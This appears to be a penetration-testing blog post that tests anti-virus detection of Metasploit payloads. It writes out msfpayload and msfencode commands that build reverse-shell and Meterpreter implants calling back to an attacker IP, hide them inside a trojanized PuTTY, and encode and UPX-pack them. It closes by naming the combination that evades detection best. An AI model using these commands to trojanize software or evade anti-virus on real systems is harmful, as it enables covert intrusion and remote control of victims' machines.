Anti-virus evasion – 1. Choosing a payload

I know a number of professional penetration testers who refuse to use Metasploit in their professional tests because of the chance it will be picked up by anti-virus systems on their client’s network. Metasploit is a known, free, hacking tool, and therefore the risk of detection is too great, they say.

We have put this premise to the test by running four popular Metasploit payloads through a number of popular anti-virus products. We chose four popular payloads used to gain interactive control of a target computer running Windows:

• Meterpreter using Reverse TCP (staged)
• Shell using Reverse TCP (single)
• Shell using Reverse DNS (staged)
• Shall using Reverse HTTP (staged)

We’ve selected both single payload (the whole payload is included) and staged payloads (the original payload contains instructions to download the full payload). Staged payloads are often used to avoid anti-virus detection because the signature is much reduced, and static heutirstic analysis can’t reveal any malicious behaviour. Dynamic heuristic analysis would, of course, spot the full payload being downloaded and executed.

We generated three forms of each of the four payloads:

• A raw payload as a Windows exe
• Embedded into PuTTY and encoded using Metasploit’s Shikata Ga Nai algorithm
• Embedded into PuTTY using Shikata Ga Nai and then packed using UPX

As a control, we also ran a clean form of PuTTY through all the virus scanners in both native form and also packed using UPX.

Generation of raw payloads

Metasploit payloads can be generated at the command line using msfpayload. It can output in windows exe format, as raw binary shellcode, and in various programming languages ready for compilation. The following executable payloads were generated:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > mrt.exe
$ msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > srt.exe
$ msfpayload windows/shell/reverse_tcp_dns LHOST=192.168.1.68 LPORT=4444 X > srdt.exe
$ msfpayload windows/shell/reverse_http PXHOST=192.168.1.68 LPORT=4444 X > srh.exe

Generating encoded payloads using Metasploit’s Shikata Ga Nai

The assumption behind encoded payloads is that fewer anti-virus products will pick up on them. Standard signature detection will be defeated, so the anti-virus program must either unpack the payloads statically, or run the applications dynamically in a sandbox and monitor their behaviour (i.e. heuristic scanning).

The msfencode utility can be used to encode a payload in raw format from msfpayload and can also place it into a host binary, in this case the PuTTY application. The following encoded payloads were generated:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_mrt.exe
$ msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_srt.exe
$ msfpayload windows/shell/reverse_tcp_dns LHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_srtd.exe
$ msfpayload windows/shell/reverse_http PXHOST=192.168.1.68 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe ./putty.exe -o ./putty_srh.exe

Packing with UPX

Each of the Shikata Ga Nai packed payloads, embedded into PuTTY, were packed using the popular UPX packer which compresses the executable code and adds a real-time decompressor to the executable. Like the use of Shikata Ga Nai, UPX reduces the ability of an anti-virus product to use signature detection.

Results

First, our control tests. No anti-virus products detected PuTTY as a virus. Around 8% detected the UPX packed version of PuTTY as a virus. This indicates that these products assume that any UPX executable is malicious.

All the payloads we created were detected by at least 60% of the anti-virus products we tested. These represent a cross-section of popular free and commercial solutions currently available. Use of HTTP as a transport mechanism slightly reduced the chance of detection. Shikata Ga Nai marginly reduced the number of anti-virus protects that detected the payloads, most noticably when using staged payloads (DNS and HTTP).

Most interestingly, despite 8% of products flagging any UPX packed binary, only around 50% of the products tested detected the UPX packed payloads. Presumably a limited number of the products we used have a UPX unpacking capability.

Conclusion

Staged payloads, embedded into a host application, and then packed with UPX, are the most effective Metasploit combinations that we tested, and were detected by only 40% of the anti-virus products in our lab.

If you want to avoid detection, a 60% success rate is not good enough. Remember, our implant was caught by 40% of the products, not 40% of the targets. Assuming the better anti-virus products have a larger market share, our 40% product failure rate could look more like an 80 or 90% detection rate on target machines.

In Part 2 of this series, we’ll example the use of custom shellcode to evade anti-virus. Heuristic scanners are always difficult to evade becuase they examine the behaviour of the payload, but signature based detection systems will miss anything they don’t already know about. Writing your own unknown and unsignatured shellcode is therefore the first step towards slipping through their net.